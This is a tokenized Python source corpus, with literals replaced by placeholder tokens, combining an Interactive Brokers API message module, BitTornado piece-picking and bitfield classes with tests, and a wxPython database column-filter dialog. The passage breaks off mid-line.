PortfolioMessage ( contract , <EOL> position , <EOL> marketPrice , <EOL> marketValue , <EOL> averageCost , <EOL> unrealizedPNL , <EOL> realizedPNL , <EOL> accountName ) <EOL> if '<STR_LIT>' in self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages = [ msg ] <EOL> else : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . add_message ( msg ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error ( self , id = None , errorCode = None , errorMsg = None ) : <EOL> msg = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT>' : errorCode , <EOL> '<STR_LIT>' : errorMsg } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT:error>' , vars ( ) ) </s>
<s> """<STR_LIT>""" </s>
<s> from ast import NodeVisitor , parse <EOL> from inspect import getsourcefile <EOL> from re import match <EOL> from ib . ext . AnyWrapper import AnyWrapper <EOL> from ib . ext . EWrapper import EWrapper <EOL> from ib . ext . EClientSocket import EClientSocket <EOL> from ib . lib import toTypeName <EOL> class SignatureAccumulator ( NodeVisitor ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def __init__ ( self , classes ) : <EOL> NodeVisitor . __init__ ( self ) <EOL> self . signatures = [ ] <EOL> for filename in ( getsourcefile ( cls ) for cls in classes ) : <EOL> self . visit ( parse ( open ( filename ) . read ( ) ) ) <EOL> def visit_FunctionDef ( self , node ) : <EOL> args = [ arg . id for arg in node . args . args ] <EOL> self . signatures . append ( ( node . name , args [ <NUM_LIT:1> : ] ) ) <EOL> class EClientSocketAccumulator ( SignatureAccumulator ) : <EOL> def getSignatures ( self ) : <EOL> for name , args in self . signatures : <EOL> if match ( '<STR_LIT>' , name ) : <EOL> yield ( name , args ) <EOL> class EWrapperAccumulator ( SignatureAccumulator ) : <EOL> def getSignatures ( self ) : <EOL> for name , args in self . signatures : <EOL> if match ( '<STR_LIT>' , name ) : <EOL> yield ( name , args ) <EOL> registry = { } <EOL> def messageTypeNames ( ) : <EOL> """<STR_LIT>""" <EOL> def typeNames ( ) : <EOL> for types in registry . values ( ) : <EOL> for typ in types : <EOL> yield typ . typeName <EOL> return set ( typeNames ( ) ) <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> def __init__ ( self , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> for name in self . __slots__ : <EOL> setattr ( self , name , kwds . pop ( name , None ) ) <EOL> assert not kwds <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . keys ( ) ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> name = self . typeName <EOL> items = str . join ( '<STR_LIT:U+002CU+0020>' , [ '<STR_LIT>' % item for item in self . items ( ) ] ) <EOL> return '<STR_LIT>' % ( name , ( '<STR_LIT:U+0020>' + items ) if items else '<STR_LIT>' ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return zip ( self . keys ( ) , self . values ( ) ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ getattr ( self , key , None ) for key in self . keys ( ) ] <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __slots__ <EOL> class Error ( Message ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def buildMessageRegistry ( seq , suffixes = [ '<STR_LIT>' ] , bases = ( Message , ) ) : <EOL> """<STR_LIT>""" <EOL> for name , args in sorted ( seq ) : <EOL> for suffix in suffixes : <EOL> typename = toTypeName ( name ) + suffix <EOL> typens = { '<STR_LIT>' : args , '<STR_LIT>' : name , '<STR_LIT>' : name } <EOL> msgtype = type ( typename , bases , typens ) <EOL> if name in registry : <EOL> registry [ name ] = registry [ name ] + ( msgtype , ) <EOL> else : <EOL> registry [ name ] = ( msgtype , ) <EOL> eWrapperAccum = EWrapperAccumulator ( ( AnyWrapper , EWrapper ) ) <EOL> eClientAccum = EClientSocketAccumulator ( ( EClientSocket , ) ) <EOL> wrapperMethods = list ( eWrapperAccum . getSignatures ( ) ) <EOL> clientSocketMethods = list ( eClientAccum . getSignatures ( ) ) <EOL> errorMethods = [ ( '<STR_LIT:error>' , Error . __slots__ ) , ] <EOL> buildMessageRegistry ( wrapperMethods ) <EOL> buildMessageRegistry ( clientSocketMethods , suffixes = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> buildMessageRegistry ( errorMethods ) <EOL> def initModule ( ) : <EOL> target = globals ( ) <EOL> for messageTypes in registry . values ( ) : <EOL> for messageType in messageTypes : <EOL> target [ messageType . typeName ] = messageType <EOL> try : <EOL> initModule ( ) <EOL> except ( NameError , ) : <EOL> pass <EOL> else : <EOL> del ( initModule ) <EOL> del ( AnyWrapper ) <EOL> del ( EWrapper ) <EOL> del ( EClientSocket ) <EOL> del ( eWrapperAccum ) <EOL> del ( eClientAccum ) </s>
<s> from random import randrange , shuffle <EOL> from BitTornado . clock import clock <EOL> try : <EOL> True <EOL> except : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> class PiecePicker : <EOL> def __init__ ( self , numpieces , <EOL> rarest_first_cutoff = <NUM_LIT:1> , rarest_first_priority_cutoff = <NUM_LIT:3> , <EOL> priority_step = <NUM_LIT:20> ) : <EOL> self . rarest_first_cutoff = rarest_first_cutoff <EOL> self . rarest_first_priority_cutoff = rarest_first_priority_cutoff + priority_step <EOL> self . priority_step = priority_step <EOL> self . cutoff = rarest_first_priority_cutoff <EOL> self . numpieces = numpieces <EOL> self . started = [ ] <EOL> self . totalcount = <NUM_LIT:0> <EOL> self . numhaves = [ <NUM_LIT:0> ] * numpieces <EOL> self . priority = [ <NUM_LIT:1> ] * numpieces <EOL> self . removed_partials = { } <EOL> self . crosscount = [ numpieces ] <EOL> self . crosscount2 = [ numpieces ] <EOL> self . has = [ <NUM_LIT:0> ] * numpieces <EOL> self . numgot = <NUM_LIT:0> <EOL> self . done = False <EOL> self . seed_connections = { } <EOL> self . past_ips = { } <EOL> self . seed_time = None <EOL> self . superseed = False <EOL> self . seeds_connected = <NUM_LIT:0> <EOL> self . _init_interests ( ) <EOL> def _init_interests ( self ) : <EOL> self . interests = [ [ ] for x in xrange ( self . priority_step ) ] <EOL> self . level_in_interests = [ self . priority_step ] * self . numpieces <EOL> interests = range ( self . numpieces ) <EOL> shuffle ( interests ) <EOL> self . pos_in_interests = [ <NUM_LIT:0> ] * self . numpieces <EOL> for i in xrange ( self . numpieces ) : <EOL> self . pos_in_interests [ interests [ i ] ] = i <EOL> self . interests . append ( interests ) <EOL> def got_have ( self , piece ) : <EOL> self . totalcount += <NUM_LIT:1> <EOL> numint = self . numhaves [ piece ] <EOL> self . numhaves [ piece ] += <NUM_LIT:1> <EOL> self . crosscount [ numint ] -= <NUM_LIT:1> <EOL> if numint + <NUM_LIT:1> == len ( self . crosscount ) : <EOL> self . crosscount . append ( <NUM_LIT:0> ) <EOL> self . crosscount [ numint + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if not self . done : <EOL> numintplus = numint + self . has [ piece ] <EOL> self . crosscount2 [ numintplus ] -= <NUM_LIT:1> <EOL> if numintplus + <NUM_LIT:1> == len ( self . crosscount2 ) : <EOL> self . crosscount2 . append ( <NUM_LIT:0> ) <EOL> self . crosscount2 [ numintplus + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> if self . superseed : <EOL> self . seed_got_haves [ piece ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> elif self . has [ piece ] or self . priority [ piece ] == - <NUM_LIT:1> : <EOL> return <EOL> if numint == len ( self . interests ) - <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . interests [ numint + <NUM_LIT:1> ] ) <EOL> def lost_have ( self , piece ) : <EOL> self . totalcount -= <NUM_LIT:1> <EOL> numint = self . numhaves [ piece ] <EOL> self . numhaves [ piece ] -= <NUM_LIT:1> <EOL> self . crosscount [ numint ] -= <NUM_LIT:1> <EOL> self . crosscount [ numint - <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if not self . done : <EOL> numintplus = numint + self . has [ piece ] <EOL> self . crosscount2 [ numintplus ] -= <NUM_LIT:1> <EOL> self . crosscount2 [ numintplus - <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] -= <NUM_LIT:1> <EOL> if self . superseed : <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] -= <NUM_LIT:1> <EOL> elif self . has [ piece ] or self . priority [ piece ] == - <NUM_LIT:1> : <EOL> return <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . interests [ numint - <NUM_LIT:1> ] ) <EOL> def _shift_over ( self , piece , l1 , l2 ) : <EOL> assert self . superseed or ( not self . has [ piece ] and self . priority [ piece ] >= <NUM_LIT:0> ) <EOL> parray = self . pos_in_interests <EOL> p = parray [ piece ] <EOL> assert l1 [ p ] == piece <EOL> q = l1 [ - <NUM_LIT:1> ] <EOL> l1 [ p ] = q <EOL> parray [ q ] = p <EOL> del l1 [ - <NUM_LIT:1> ] <EOL> newp = randrange ( len ( l2 ) + <NUM_LIT:1> ) <EOL> if newp == len ( l2 ) : <EOL> parray [ piece ] = len ( l2 ) <EOL> l2 . append ( piece ) <EOL> else : <EOL> old = l2 [ newp ] <EOL> parray [ old ] = len ( l2 ) <EOL> l2 . append ( old ) <EOL> l2 [ newp ] = piece <EOL> parray [ piece ] = newp <EOL> def got_seed ( self ) : <EOL> self . seeds_connected += <NUM_LIT:1> <EOL> self . cutoff = max ( self . rarest_first_priority_cutoff - self . seeds_connected , <NUM_LIT:0> ) <EOL> def became_seed ( self ) : <EOL> self . got_seed ( ) <EOL> self . totalcount -= self . numpieces <EOL> self . numhaves = [ i - <NUM_LIT:1> for i in self . numhaves ] <EOL> if self . superseed or not self . done : <EOL> self . level_in_interests = [ i - <NUM_LIT:1> for i in self . level_in_interests ] <EOL> if self . interests : <EOL> del self . interests [ <NUM_LIT:0> ] <EOL> del self . crosscount [ <NUM_LIT:0> ] <EOL> if not self . done : <EOL> del self . crosscount2 [ <NUM_LIT:0> ] <EOL> def lost_seed ( self ) : <EOL> self . seeds_connected -= <NUM_LIT:1> <EOL> self . cutoff = max ( self . rarest_first_priority_cutoff - self . seeds_connected , <NUM_LIT:0> ) <EOL> def requested ( self , piece ) : <EOL> if piece not in self . started : <EOL> self . started . append ( piece ) <EOL> def _remove_from_interests ( self , piece , keep_partial = False ) : <EOL> l = self . interests [ self . level_in_interests [ piece ] ] <EOL> p = self . pos_in_interests [ piece ] <EOL> assert l [ p ] == piece <EOL> q = l [ - <NUM_LIT:1> ] <EOL> l [ p ] = q <EOL> self . pos_in_interests [ q ] = p <EOL> del l [ - <NUM_LIT:1> ] <EOL> try : <EOL> self . started . remove ( piece ) <EOL> if keep_partial : <EOL> self . removed_partials [ piece ] = <NUM_LIT:1> <EOL> except ValueError : <EOL> pass <EOL> def complete ( self , piece ) : <EOL> assert not self . has [ piece ] <EOL> self . has [ piece ] = <NUM_LIT:1> <EOL> self . numgot += <NUM_LIT:1> <EOL> if self . numgot == self . numpieces : <EOL> self . done = True <EOL> self . crosscount2 = self . crosscount <EOL> else : <EOL> numhaves = self . numhaves [ piece ] <EOL> self . crosscount2 [ numhaves ] -= <NUM_LIT:1> <EOL> if numhaves + <NUM_LIT:1> == len ( self . crosscount2 ) : <EOL> self . crosscount2 . append ( <NUM_LIT:0> ) <EOL> self . crosscount2 [ numhaves + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> self . _remove_from_interests ( piece ) <EOL> def next ( self , haves , wantfunc , complete_first = False ) : <EOL> cutoff = self . numgot < self . rarest_first_cutoff <EOL> complete_first = ( complete_first or cutoff ) and not haves . complete ( ) <EOL> best = None <EOL> bestnum = <NUM_LIT:2> ** <NUM_LIT:30> <EOL> for i in self . started : <EOL> if haves [ i ] and wantfunc ( i ) : <EOL> if self . level_in_interests [ i ] < bestnum : <EOL> best = i <EOL> bestnum = self . level_in_interests [ i ] <EOL> if best is not None : <EOL> if complete_first or ( cutoff and len ( self . interests ) > self . cutoff ) : <EOL> return best <EOL> if haves . complete ( ) : <EOL> r = [ ( <NUM_LIT:0> , min ( bestnum , len ( self . interests ) ) ) ] <EOL> elif cutoff and len ( self . interests ) > self . cutoff : <EOL> r = [ ( self . cutoff , min ( bestnum , len ( self . interests ) ) ) , <EOL> ( <NUM_LIT:0> , self . cutoff ) ] <EOL> else : <EOL> r = [ ( <NUM_LIT:0> , min ( bestnum , len ( self . interests ) ) ) ] <EOL> for lo , hi in r : <EOL> for i in xrange ( lo , hi ) : <EOL> for j in self . interests [ i ] : <EOL> if haves [ j ] and wantfunc ( j ) : <EOL> return j <EOL> if best is not None : <EOL> return best <EOL> return None <EOL> def am_I_complete ( self ) : <EOL> return self . done <EOL> def bump ( self , piece ) : <EOL> l = self . interests [ self . level_in_interests [ piece ] ] <EOL> pos = self . pos_in_interests [ piece ] <EOL> del l [ pos ] <EOL> l . append ( piece ) <EOL> for i in range ( pos , len ( l ) ) : <EOL> self . pos_in_interests [ l [ i ] ] = i <EOL> try : <EOL> self . started . remove ( piece ) <EOL> except : <EOL> pass <EOL> def set_priority ( self , piece , p ) : <EOL> if self . superseed : <EOL> return False <EOL> oldp = self . priority [ piece ] <EOL> if oldp == p : <EOL> return False <EOL> self . priority [ piece ] = p <EOL> if p == - <NUM_LIT:1> : <EOL> if not self . has [ piece ] : <EOL> self . _remove_from_interests ( piece , True ) <EOL> return True <EOL> if oldp == - <NUM_LIT:1> : <EOL> level = self . numhaves [ piece ] + ( self . priority_step * p ) <EOL> self . level_in_interests [ piece ] = level <EOL> if self . has [ piece ] : <EOL> return True <EOL> while len ( self . interests ) < level + <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> l2 = self . interests [ level ] <EOL> parray = self . pos_in_interests <EOL> newp = randrange ( len ( l2 ) + <NUM_LIT:1> ) <EOL> if newp == len ( l2 ) : <EOL> parray [ piece ] = len ( l2 ) <EOL> l2 . append ( piece ) <EOL> else : <EOL> old = l2 [ newp ] <EOL> parray [ old ] = len ( l2 ) <EOL> l2 . append ( old ) <EOL> l2 [ newp ] = piece <EOL> parray [ piece ] = newp <EOL> if self . removed_partials . has_key ( piece ) : <EOL> del self . removed_partials [ piece ] <EOL> self . started . append ( piece ) <EOL> return True <EOL> numint = self . level_in_interests [ piece ] <EOL> newint = numint + ( ( p - oldp ) * self . priority_step ) <EOL> self . level_in_interests [ piece ] = newint <EOL> if self . has [ piece ] : <EOL> return False <EOL> while len ( self . interests ) < newint + <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . interests [ newint ] ) <EOL> return False <EOL> def is_blocked ( self , piece ) : <EOL> return self . priority [ piece ] < <NUM_LIT:0> <EOL> def set_superseed ( self ) : <EOL> assert self . done <EOL> self . superseed = True <EOL> self . seed_got_haves = [ <NUM_LIT:0> ] * self . numpieces <EOL> self . _init_interests ( ) <EOL> def next_have ( self , connection , looser_upload ) : <EOL> if self . seed_time is None : <EOL> self . seed_time = clock ( ) <EOL> return None <EOL> if clock ( ) < self . seed_time + <NUM_LIT:10> : <EOL> return None <EOL> if not connection . upload . super_seeding : <EOL> return None <EOL> olddl = self . seed_connections . get ( connection ) <EOL> if olddl is None : <EOL> ip = connection . get_ip ( ) <EOL> olddl = self . past_ips . get ( ip ) <EOL> if olddl is not None : <EOL> self . seed_connections [ connection ] = olddl <EOL> if not looser_upload : <EOL> self . seed_got_haves [ olddl ] -= <NUM_LIT:1> <EOL> if olddl is not None : <EOL> if looser_upload : <EOL> num = <NUM_LIT:1> <EOL> else : <EOL> num = <NUM_LIT:2> <EOL> if self . seed_got_haves [ olddl ] < num : <EOL> return None <EOL> if not connection . upload . was_ever_interested : <EOL> connection . upload . skipped_count += <NUM_LIT:1> <EOL> if connection . upload . skipped_count >= <NUM_LIT:3> : <EOL> return - <NUM_LIT:1> <EOL> for tier in self . interests : <EOL> for piece in tier : <EOL> if not connection . download . have [ piece ] : <EOL> seedint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> if seedint == len ( self . interests ) - <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , <EOL> self . interests [ seedint ] , self . interests [ seedint + <NUM_LIT:1> ] ) <EOL> self . seed_got_haves [ piece ] = <NUM_LIT:0> <EOL> self . seed_connections [ connection ] = piece <EOL> connection . upload . seed_have_list . append ( piece ) <EOL> return piece <EOL> return - <NUM_LIT:1> <EOL> def lost_peer ( self , connection ) : <EOL> olddl = self . seed_connections . get ( connection ) <EOL> if olddl is None : <EOL> return <EOL> del self . seed_connections [ connection ] <EOL> self . past_ips [ connection . get_ip ( ) ] = olddl <EOL> if self . seed_got_haves [ olddl ] == <NUM_LIT:1> : <EOL> self . seed_got_haves [ olddl ] = <NUM_LIT:0> </s>
<s> try : <EOL> True <EOL> except : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> bool = lambda x : not not x <EOL> try : <EOL> sum ( [ <NUM_LIT:1> ] ) <EOL> negsum = lambda a : len ( a ) - sum ( a ) <EOL> except : <EOL> negsum = lambda a : reduce ( lambda x , y : x + ( not y ) , a , <NUM_LIT:0> ) <EOL> def _int_to_booleans ( x ) : <EOL> r = [ ] <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> r . append ( bool ( x & <NUM_LIT> ) ) <EOL> x <<= <NUM_LIT:1> <EOL> return tuple ( r ) <EOL> lookup_table = [ ] <EOL> reverse_lookup_table = { } <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> x = _int_to_booleans ( i ) <EOL> lookup_table . append ( x ) <EOL> reverse_lookup_table [ x ] = chr ( i ) <EOL> class Bitfield : <EOL> def __init__ ( self , length = None , bitstring = None , copyfrom = None ) : <EOL> if copyfrom is not None : <EOL> self . length = copyfrom . length <EOL> self . array = copyfrom . array [ : ] <EOL> self . numfalse = copyfrom . numfalse <EOL> return <EOL> if length is None : <EOL> raise ValueError , "<STR_LIT>" <EOL> self . length = length <EOL> if bitstring is not None : <EOL> extra = len ( bitstring ) * <NUM_LIT:8> - length <EOL> if extra < <NUM_LIT:0> or extra >= <NUM_LIT:8> : <EOL> raise ValueError <EOL> t = lookup_table <EOL> r = [ ] <EOL> for c in bitstring : <EOL> r . extend ( t [ ord ( c ) ] ) <EOL> if extra > <NUM_LIT:0> : <EOL> if r [ - extra : ] != [ <NUM_LIT:0> ] * extra : <EOL> raise ValueError <EOL> del r [ - extra : ] <EOL> self . array = r <EOL> self . numfalse = negsum ( r ) <EOL> else : <EOL> self . array = [ False ] * length <EOL> self . numfalse = length <EOL> def __setitem__ ( self , index , val ) : <EOL> val = bool ( val ) <EOL> self . numfalse += self . array [ index ] - val <EOL> self . array [ index ] = val <EOL> def __getitem__ ( self , index ) : <EOL> return self . array [ index ] <EOL> def __len__ ( self ) : <EOL> return self . length <EOL> def tostring ( self ) : <EOL> booleans = self . array <EOL> t = reverse_lookup_table <EOL> s = len ( booleans ) % <NUM_LIT:8> <EOL> r = [ t [ tuple ( booleans [ x : x + <NUM_LIT:8> ] ) ] for x in xrange ( <NUM_LIT:0> , len ( booleans ) - s , <NUM_LIT:8> ) ] <EOL> if s : <EOL> r += t [ tuple ( booleans [ - s : ] + ( [ <NUM_LIT:0> ] * ( <NUM_LIT:8> - s ) ) ) ] <EOL> return '<STR_LIT>' . join ( r ) <EOL> def complete ( self ) : <EOL> return not self . numfalse <EOL> def test_bitfield ( ) : <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , '<STR_LIT:abc>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:0> , '<STR_LIT:a>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:8> , '<STR_LIT>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , '<STR_LIT:a>' ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:7> , chr ( <NUM_LIT:1> ) ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> x = Bitfield ( <NUM_LIT:9> , chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) ) <EOL> assert False <EOL> except ValueError : <EOL> pass <EOL> assert Bitfield ( <NUM_LIT:0> , '<STR_LIT>' ) . tostring ( ) == '<STR_LIT>' <EOL> assert Bitfield ( <NUM_LIT:1> , chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:7> , chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:8> , chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT> ) <EOL> assert Bitfield ( <NUM_LIT:9> , chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) ) . tostring ( ) == chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:1> ) <EOL> assert x . numfalse == <NUM_LIT:1> <EOL> x [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:0> <EOL> x [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:0> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:7> ) <EOL> assert len ( x ) == <NUM_LIT:7> <EOL> x [ <NUM_LIT:6> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:6> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:8> ) <EOL> x [ <NUM_LIT:7> ] = <NUM_LIT:1> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT:1> ) <EOL> x = Bitfield ( <NUM_LIT:9> ) <EOL> x [ <NUM_LIT:8> ] = <NUM_LIT:1> <EOL> assert x . numfalse == <NUM_LIT:8> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT:0> ) + chr ( <NUM_LIT> ) <EOL> x = Bitfield ( <NUM_LIT:8> , chr ( <NUM_LIT> ) ) <EOL> assert len ( x ) == <NUM_LIT:8> <EOL> assert x . numfalse == <NUM_LIT:5> <EOL> assert x . tostring ( ) == chr ( <NUM_LIT> ) </s>
<s> import wx <EOL> import re <EOL> import sqltools as sql <EOL> from properties import Properties <EOL> from dbconnect import DBConnect <EOL> from wx . combo import OwnerDrawnComboBox as ComboBox <EOL> p = Properties . getInstance ( ) <EOL> db = DBConnect . getInstance ( ) <EOL> class ColumnFilterPanel ( wx . Panel ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , parent , tables , allow_delete = True , expression = None , ** kwargs ) : <EOL> wx . Panel . __init__ ( self , parent , ** kwargs ) <EOL> self . fieldSets = [ ] <EOL> self . tables = tables <EOL> self . types = { } <EOL> self . types [ p . image_table ] = db . GetColumnTypes ( p . image_table ) <EOL> self . tableChoice = ComboBox ( self , choices = self . tables , size = ( <NUM_LIT> , - <NUM_LIT:1> ) , style = wx . CB_READONLY ) <EOL> self . tableChoice . Select ( <NUM_LIT:0> ) <EOL> self . colChoice = ComboBox ( self , choices = db . GetColumnNames ( p . image_table ) , size = ( <NUM_LIT> , - <NUM_LIT:1> ) , style = wx . CB_READONLY ) <EOL> self . colChoice . Select ( <NUM_LIT:0> ) <EOL> self . comparatorChoice = ComboBox ( self , size = ( <NUM_LIT> , - <NUM_LIT:1> ) ) <EOL> self . update_comparator_choice ( ) <EOL> self . valueField = wx . ComboBox ( self , - <NUM_LIT:1> , value = '<STR_LIT>' ) <EOL> if allow_delete : <EOL> self . x_btn = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT:x>' , size = ( <NUM_LIT:30> , - <NUM_LIT:1> ) ) <EOL> colSizer = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> colSizer . Add ( self . tableChoice , <NUM_LIT:1> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . colChoice , <NUM_LIT:1> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . comparatorChoice , <NUM_LIT:0.5> , wx . EXPAND ) <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . valueField , <NUM_LIT:1> , wx . EXPAND ) <EOL> if allow_delete : <EOL> colSizer . AddSpacer ( ( <NUM_LIT:5> , - <NUM_LIT:1> ) ) <EOL> colSizer . Add ( self . x_btn , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . SetSizer ( colSizer ) <EOL> self . tableChoice . Bind ( wx . EVT_COMBOBOX , self . on_select_table ) <EOL> self . colChoice . Bind ( wx . EVT_COMBOBOX , self . on_select_col ) <EOL> if allow_delete : <EOL> self . x_btn . Bind ( wx . EVT_BUTTON , self . on_remove ) <EOL> self . Fit ( ) <EOL> def on_remove ( self , evt ) : <EOL> self . GrandParent . remove ( self ) <EOL> def on_select_col ( self , evt ) : <EOL> self . update_comparator_choice ( ) <EOL> self . update_value_choice ( ) <EOL> def on_select_table ( self , evt ) : <EOL> self . update_col_choice ( ) <EOL> self . update_comparator_choice ( ) <EOL> self . update_value_choice ( ) <EOL> def update_col_choice ( self ) : <EOL> table = self . tableChoice . Value <EOL> self . colChoice . SetItems ( db . GetColumnNames ( table ) ) <EOL> self . colChoice . Select ( <NUM_LIT:0> ) <EOL> def _get_col_type ( self ) : <EOL> table = self . tableChoice . Value <EOL> colidx = self . colChoice . GetSelection ( ) <EOL> return db . GetColumnTypes ( table ) [ colidx ] <EOL> def update_comparator_choice ( self ) : <EOL> coltype = self . _get_col_type ( ) <EOL> comparators = [ ] <EOL> if coltype in [ str , unicode ] : <EOL> comparators = [ '<STR_LIT:=>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if coltype in [ int , float , long ] : <EOL> comparators = [ '<STR_LIT:=>' , '<STR_LIT>' , '<STR_LIT:<>' , '<STR_LIT:>>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . comparatorChoice . SetItems ( comparators ) <EOL> self . comparatorChoice . Select ( <NUM_LIT:0> ) <EOL> def update_value_choice ( self ) : <EOL> table = self . tableChoice . Value <EOL> column = self . colChoice . Value <EOL> colidx = self . colChoice . GetSelection ( ) <EOL> coltype = db . GetColumnTypes ( table ) [ colidx ] <EOL> vals = [ ] <EOL> self . valueField . SetItems ( vals ) <EOL> def get_filter ( self ) : <EOL> table = self . tableChoice . Value <EOL> column = self . colChoice . Value <EOL> comparator = self . comparatorChoice . GetValue ( ) <EOL> value = self . valueField . GetValue ( ) <EOL> if self . _get_col_type ( ) in [ int , float , long ] : <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT:%s>' % ( value ) ) <EOL> if comparator . upper ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] and value . upper ( ) == '<STR_LIT>' : <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT:%s>' % ( value ) ) <EOL> return sql . Filter ( sql . Column ( table , column ) , comparator , '<STR_LIT>' % ( value ) ) <EOL> class ColumnFilterDialog ( wx . Dialog ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , parent , tables , ** kwargs ) : <EOL> wx . Dialog . __init__ ( self , parent , - <NUM_LIT:1> , style = wx . DEFAULT_DIALOG_STYLE | wx . RESIZE_BORDER , ** kwargs ) <EOL> self . tables = tables <EOL> self . conjunctions = [ ] <EOL> self . filter_name = wx . TextCtrl ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . addbtn = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . ok = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT:OK>' ) <EOL> self . cancel = wx . Button ( self , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . Sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> sz = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> sz . Add ( wx . StaticText ( self , - <NUM_LIT:1> , '<STR_LIT>' ) , <NUM_LIT:0> , wx . CENTER ) <EOL> sz . Add ( self . filter_name , 